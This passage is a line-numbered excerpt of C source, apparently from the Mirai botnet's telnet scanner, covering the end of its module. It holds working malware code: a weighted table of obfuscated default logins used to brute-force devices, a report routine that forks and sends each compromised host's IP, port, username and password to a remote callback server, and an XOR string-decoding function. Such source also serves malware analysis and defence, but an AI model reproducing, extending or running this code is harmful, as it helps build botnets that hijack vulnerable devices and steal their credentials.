853. if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1) != -1)
854. {
855. table_lock_val(TABLE_SCAN_NCORRECT);
856. return -1;
857. }
858. table_lock_val(TABLE_SCAN_NCORRECT);
859.  
860. table_unlock_val(TABLE_SCAN_RESP);
861. tkn_resp = table_retrieve_val(TABLE_SCAN_RESP, &len);
862. prompt_ending = util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1);
863. table_lock_val(TABLE_SCAN_RESP);
864.  
865. if (prompt_ending == -1)
866. return 0;
867. else
868. return prompt_ending;
869. }
870.  
871. static void add_auth_entry(char *enc_user, char *enc_pass, uint16_t weight)
872. {
873. int tmp;
874.  
875. auth_table = realloc(auth_table, (auth_table_len + 1) * sizeof (struct scanner_auth));
876. auth_table[auth_table_len].username = deobf(enc_user, &tmp);
877. auth_table[auth_table_len].username_len = (uint8_t)tmp;
878. auth_table[auth_table_len].password = deobf(enc_pass, &tmp);
879. auth_table[auth_table_len].password_len = (uint8_t)tmp;
880. auth_table[auth_table_len].weight_min = auth_table_max_weight;
881. auth_table[auth_table_len++].weight_max = auth_table_max_weight + weight;
882. auth_table_max_weight += weight;
883. }
884.  
885. static struct scanner_auth *random_auth_entry(void)
886. {
887. int i;
888. uint16_t r = (uint16_t)(rand_next() % auth_table_max_weight);
889.  
890. for (i = 0; i < auth_table_len; i++)
891. {
892. if (r < auth_table[i].weight_min)
893. continue;
894. else if (r < auth_table[i].weight_max)
895. return &auth_table[i];
896. }
897.  
898. return NULL;
899. }
900.  
901. static void report_working(ipv4_t daddr, uint16_t dport, struct scanner_auth *auth)
902. {
903. struct sockaddr_in addr;
904. int pid = fork(), fd;
905. struct resolv_entries *entries = NULL;
906.  
907. if (pid > 0 || pid == -1)
908. return;
909.  
910. if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
911. {
912. #ifdef DEBUG
913. printf("[report] Failed to call socket()\n");
914. #endif
915. exit(0);
916. }
917.  
918. table_unlock_val(TABLE_SCAN_CB_DOMAIN);
919. table_unlock_val(TABLE_SCAN_CB_PORT);
920.  
921. entries = resolv_lookup(table_retrieve_val(TABLE_SCAN_CB_DOMAIN, NULL));
922. if (entries == NULL)
923. {
924. #ifdef DEBUG
925. printf("[report] Failed to resolve report address\n");
926. #endif
927. return;
928. }
929. addr.sin_family = AF_INET;
930. addr.sin_addr.s_addr = entries->addrs[rand_next() % entries->addrs_len];
931. addr.sin_port = *((port_t *)table_retrieve_val(TABLE_SCAN_CB_PORT, NULL));
932. resolv_entries_free(entries);
933.  
934. table_lock_val(TABLE_SCAN_CB_DOMAIN);
935. table_lock_val(TABLE_SCAN_CB_PORT);
936.  
937. if (connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in)) == -1)
938. {
939. #ifdef DEBUG
940. printf("[report] Failed to connect to scanner callback!\n");
941. #endif
942. close(fd);
943. exit(0);
944. }
945.  
946. uint8_t zero = 0;
947. send(fd, &zero, sizeof (uint8_t), MSG_NOSIGNAL);
948. send(fd, &daddr, sizeof (ipv4_t), MSG_NOSIGNAL);
949. send(fd, &dport, sizeof (uint16_t), MSG_NOSIGNAL);
950. send(fd, &(auth->username_len), sizeof (uint8_t), MSG_NOSIGNAL);
951. send(fd, auth->username, auth->username_len, MSG_NOSIGNAL);
952. send(fd, &(auth->password_len), sizeof (uint8_t), MSG_NOSIGNAL);
953. send(fd, auth->password, auth->password_len, MSG_NOSIGNAL);
954.  
955. #ifdef DEBUG
956. printf("[report] Send scan result to loader\n");
957. #endif
958.  
959. close(fd);
960. exit(0);
961. }
962.  
963. static char *deobf(char *str, int *len)
964. {
965. int i;
966. char *cpy;
967.  
968. *len = util_strlen(str);
969. cpy = malloc(*len + 1);
970.  
971. util_memcpy(cpy, str, *len + 1);
972.  
973. for (i = 0; i < *len; i++)
974. {
975. cpy[i] ^= 0xDE;
976. cpy[i] ^= 0xAD;
977. cpy[i] ^= 0xBE;
978. cpy[i] ^= 0xEF;
979. }
980.  
981. return cpy;
982. }
983.  
984. static BOOL can_consume(struct scanner_connection *conn, uint8_t *ptr, int amount)
985. {
986. uint8_t *end = conn->rdbuf + conn->rdbuf_pos;
987.  
988. return ptr + amount < end;
989. }
990.  
991. #endif